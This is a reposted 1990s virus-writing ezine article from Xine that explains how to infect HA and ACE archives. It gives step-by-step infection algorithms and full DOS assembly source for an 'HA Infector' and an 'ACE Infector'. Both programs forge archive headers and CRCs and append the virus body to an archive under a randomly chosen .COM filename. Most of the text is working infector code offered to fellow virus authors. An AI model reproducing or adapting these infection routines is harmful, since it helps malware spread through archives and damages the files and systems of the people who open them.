Copy Link
Add to Bookmark
Report

Xine - issue #3 - Phile 111

eZine's profile picture
Published in 
Xine
 · 6 months ago

 
/-----------------------------\
| Xine - issue #3 - Phile 111 |
\-----------------------------/



Dropping over
Compression alternative format : HA & ACE
By UnknowN MnemomaniaK [iKx]


Introduction to HA
+------------------+

Ha is an a bit old compression format , it was thought to work with
compatibitility from linux to ibm dos , obviously it is not really used , I
have never seen any HA but the archive exists, so I decided to code it into
my infectors series in honor of the Zhengxi virus , then let's see how it
works.

HA Format
+---------+

The Ha structure is simple like rar structure but has a little difficulty,
Ha archive is fragmented in two zones

The little that has just : db 'HA' Ha mark
dw 0 number of archive

and following this part , there are a lot of archives that all must respect
this header

OFFSET LABEL TYPE VALUE DESCRIPTION
------ ----------- ---- ----------- ----------------------------------
00 VERCOMP DB 0 compression method & ver need

value: 0 = 'CPY' Stored 2 = 'HSC' compress using a [sic?]
1 = 'ASC' Default compress. 14 = 'DIR' Directory entry
15 = 'SPECIAL' Unknwon (ver 0.99B)

01 COMPRESS HEX 00000000 compressed size
05 ORIG HEX 00000000 original size
09 CRC32 HEX 00000000 Crc32
0D DATEHOUR HEX 00000000 File-time Unix Standard
?? PATHNAME DS ? Pathname
?? SEPARATOR DB 0FF Separator equal to 0FFh
?? FILENAME DS ? Filename
?? SPEC DB 1 Machine spec

Value: 0 = MS DOS
1 = Linux

?? INFO DW 2 Information - Usually File Attributes

Infection
+---------+

The HA file infection is quite simple , you have to verify that the first 2
bytes are equal to HA , increment the word at offset 02h in the file by 1,
read 0Dh bytes , go to the end write it , write No Pathname + Filename ,
write spec and close the file , damn , let's build an algorithm

1ø Read 4 bytes
2ø Verify the 2 first bytes , if <> HA then close file
3ø Inc the word at offset 02h
4ø Read 0Dh
5ø Rebuild the CRC32 & the name , (-> rebuild header)
6ø Go to the end
7ø Write the virus
8ø Close the file

The Asm file are under the ACE infection, if you need code , don't hesitate

Introduction to ACE
+-------------------+

ACE format is a quite new format that has basically the same structure than
RAR , ACE is a serious archive build by an independent , some razor warez
issue of razor are know under this file format . Ace compression/
decompression software is quite good looking and you have very soon the
impression that you have to do with professional material.

ACE Format
+----------+

I'll just detail the format of one header only becoz you just need to drop
it and drop the virus to infect an archive

OFFSET LABEL TYP VALUE DESCRIPTION
------ ----------- ---- ----------- ----------------------------------
00 HEADCRC DW 0000 CRC32x of the header(from 04 to 04+w,[02])
02 HEADSIZ DW 0000 Size of the header
04 HEADTYPE DB 0 Header type : 01 equal files
05 HEAD-FLAGS DW 0 Header : 8001h equal no problem flags :]
07 COMPRESS HEX 00000000 Compressed size
0B ORIG HEX 00000000 Original size
0F FILE TIME HEX 00000000 File time
13 FILE ATTRIB HEX 00000000 Considered as a DWORD,but a WORD is Used
17 CRC32x HEX 00000000 CRC32x of the file
18 INFOS HEX 00000000 Unknown ( Unused ? )
1B RESERVED DW 0000 Use a existing one
1F FILENAMESIZ DW 0000 Unknown ( Unused ? )
?? FILENAME DS NameFile

Ace structure is kinda secret because not too used and not reprogrammed by
a lot of people like rar arj or zip , but by one individual person only

What's the CRC32x ? then it's basically the CRC32 who are applying a second
not. It's because the programmer forgot to put that in his CRC routine

Infection
+---------+

So , I consider that the best solution with ace files is to drop one
header from an existing packet in the archive , then you go to the end,
you rebuild the header , you calculate Header CRC , you drop the header and

1ø Go to the end
2ø Rebuild the header
3ø Write the header
4ø Write the virus
5ø Close tha file

But in the example, I have analysed the complex ACE header structure to get
an existing one header as temporary , let's see how I did that if you are
interested with that


- - - HA Infector ( test it with the appropried name file ) - - - - - - - - -

.model tiny
.code
.286

org 100h

start:

mov ax,3d02h ; open HA file
mov dx,offset name1
int 21h
xchg ax,bx

mov ah,3fh ; read first 256 byte
mov cx,256
mov dx,offset temporary1
int 21h

cmp word ptr [temporary1],'AH' ; test if archive is
jne HA_invalid ; a real ha

inc word ptr [temporary1+2] ; increment
; number of archive
mov al,2
call go ; go to the end

call HA_build ; rebuild an HA header

mov ah,40h
mov dx,offset temporary1+4
int 21h ; write the new header

mov ah,40h
mov cx,fin-start
mov dx,offset start
int 21h ; write the virus

xor ax,ax
call go

mov ah,40h
mov cx,4
mov dx,offset temporary1
int 21h ; write the new 1st
; packet
HA_invalid:

mov ah,3Eh
int 21h ; close the file

ret

HA_build:

mov bp,offset temporary1+4
mov byte ptr [bp],20h ; set to no compression & version

inc bp
mov word ptr [bp],fin-start ; set 01h = file size
mov word ptr [bp+2],0

add bp,4
mov cx,fin-start
mov word ptr [bp],cx ; set 05h = file size too
mov word ptr [bp+2],0
add bp,4

mov si,offset start

push bp
call crc_calc
pop bp

mov word ptr [bp],cx ; set 09h as CRC32 of the file
mov word ptr [bp+2],dx

add bp,8

mov byte ptr [bp],0 ; set no path name
inc bp

call set_a_name ; set a new name

mov di,bp
add bp,cx
mov si,offset betaname

repz movsb ; copy it

mov cx,bp
sub cx,offset temporary1+1

mov word ptr [bp],0102h ; write machine infos ...
mov byte ptr [bp+2],20h

ret ; return with header size in cx

set_a_name:

mov ah,2Ch ; make aleatory a new name
int 21h

and cx,0000111100001111b
and dx,0000111100001111b

add cx,4141h
add dx,4141h
mov word ptr [betaname],cx
mov word ptr [betaname+2],dx
mov word ptr [betaname+4],'C.'
mov word ptr [betaname+6],'MO'
mov word ptr [betaname+8],0

mov cx,9

ret

go: ; File seek

mov ah,42h
xor cx,cx
xor dx,dx
int 21h

ret

crc_calc:

push bx
push si cx

call crc_table ; calculate crc table

pop cx si

mov bp,cx

mov cx,0ffffh
mov dx,0ffffh

xor ax,ax

Crc_loop:

lodsb
mov bx,ax
xor bl,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,bh
shl bx,1
shl bx,1
xor cx,word ptr [bx+di]
xor dx,word ptr [bx+di+02]
dec bp

jnz Crc_loop

not dx
not cx

pop bx
ret

crc_table:

mov di,offset starttable+1024 ; the buffer table
; remember : It begin by the end
mov bp,255 ; set bp equal 255
; 255 * 4 = 1024
std ; set Direction Flag On

TableHighloop: ; the major loop in the Crc table Calc

mov cx,8 ; set the minus loop to 8
mov dx,bp ; dx = bp , major counter loop
xor ax,ax ; ax = zero

TableLowLoop:

shr ax,1 ; mov one byte of ax at right in bin
rcr dx,1 ; if anything lost , put it on dx

jae anomality ; if above or equal skip encrypt.

xor dx,08320h ; encrypt value by a signature
xor ax,0EDB8h ;

anomality:

loop TableLowLoop ; make it 8 times

stosw ; write ax
xchg dx,ax
stosw ; not write dx
dec bp ; decrement the counter

jnz TableHighLoop ; repeat it until bp = 0

mov word ptr [di],0 ; last value equal 0
sub di,2
mov word ptr [di],0
cld ; clear direction flag

ret

name1: db 'yeye.ha',0

fin:

betaname: db 13 dup (?)

starttable: db 1024 dup (?)

db 2 dup (?)

temporary1: db 256 dup (?)

end start

- - - HA Infector - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

- - - ACE Infector ( test it with the appropried name file )- - - - - - - - -

.model tiny
.code
.286

org 100h

start:

mov ax,3d02h
mov dx,offset name1
int 21h ; open filename
xchg ax,bx

mov ah,3fh
mov cx,4
mov dx,offset temporary1 ; read 4 first bye put it into
int 21h ; temporary

xor cx,cx
mov dx,word ptr [temporary1+2] ; go to offset w,[02h]
add dx,4
xor ax,ax
call gozero

mov ah,3fh
mov cx,256
mov dx,offset temporary1
int 21h ; read 256 bytes

call ace_header ; build a new ace_header

mov al,2
call go

mov ah,40h
mov cx,word ptr [bp+2]
add cx,4
mov dx,offset temporary1
int 21h ; write the header

mov ah,40h
mov cx,fin-start
mov dx,offset start
int 21h ; write the virus

ACE_invalid:

mov ah,3Eh
int 21h ; close the file

ret

ACE_header:

mov bp,offset temporary1

mov byte ptr [bp+4],01 ; set no compression
mov word ptr [bp+5],8001h ; no flags

mov word ptr [bp+7],fin-start ; virus as compress & uncpss
mov word ptr [bp+7+2],0 ; size
mov word ptr [bp+0Bh],fin-start
mov word ptr [bp+0Bh+2],0

push bp
mov si,100h
mov cx,fin-start
call crc_calc
pop bp ; calc crc of the virus

not dx ; not ( not (ax)) = ax
not cx

mov word ptr [bp+17h],cx
mov word ptr [bp+17h+2],dx ; save it here

call set_a_name ; create new name without
dec cx ; Zero End
mov word ptr [bp+1Dh+4],cx ; copy file size
mov word ptr [bp+02],cx
add word ptr [bp+02],1Fh ; copy header size (1Fh+cx)

lea di,[bp+1Fh+4]
mov si,offset betaname ;

repz movsb ; copy name

push bp

lea si,[bp+4]
mov cx,word ptr [bp+2]

call crc_calc ; render header CRC
pop bp

not cx
mov word ptr [bp],cx

ret

set_a_name: ; set a new name

mov ah,2Ch
int 21h

and cx,0000111100001111b
and dx,0000111100001111b

add cx,4141h
add dx,4141h
mov word ptr [betaname],cx
mov word ptr [betaname+2],dx
mov word ptr [betaname+4],'C.'
mov word ptr [betaname+6],'MO'
mov word ptr [betaname+8],0

mov cx,9

ret

go:

xor cx,cx
xor dx,dx

gozero:
mov ah,42h
int 21h

ret

crc_calc:

push bx
push si cx

call crc_table ; calculate crc table

pop cx si

mov bp,cx

mov cx,0ffffh
mov dx,0ffffh

xor ax,ax

Crc_loop:

lodsb
mov bx,ax
xor bl,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,bh
shl bx,1
shl bx,1
xor cx,word ptr [bx+di]
xor dx,word ptr [bx+di+02]
dec bp

jnz Crc_loop

not dx
not cx

pop bx
ret

crc_table:

mov di,offset starttable+1024-2 ; the buffer table
; remember : It begin by the end
mov bp,255 ; set bp equal 255
; 255 * 4 = 1024
std ; set Direction Flag On

TableHighloop: ; the major loop in the Crc table Calc

mov cx,8 ; set the minus loop to 8
mov dx,bp ; dx = bp , major counter loop
xor ax,ax ; ax = zero

TableLowLoop:

shr ax,1 ; mov one byte of ax at right in bin
rcr dx,1 ; if anything losted , put it on dx

jae anomality ; if above or equal skip encrypt.

xor dx,08320h ; encrypt value by a signature
xor ax,0EDB8h ;

anomality:

loop TableLowLoop ; make it 8 times

stosw ; write ax
xchg dx,ax
stosw ; not write dx
dec bp ; decrement the counter

jnz TableHighLoop ; repeat it until bp = 0

mov word ptr [di],0 ; last value equal 0
sub di,2
mov word ptr [di],0
cld ; clear direction flag

ret


name1: db 'yeye.ace',0

fin:

betaname: db 13 dup (?)

starttable: db 1024 dup (?)

db 2 dup (?)

temporary1: db 256 dup (?)

end start

- - - ACE Infector - - - - - - - - - - - - - - - - - - - - - - - - - - - - -

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT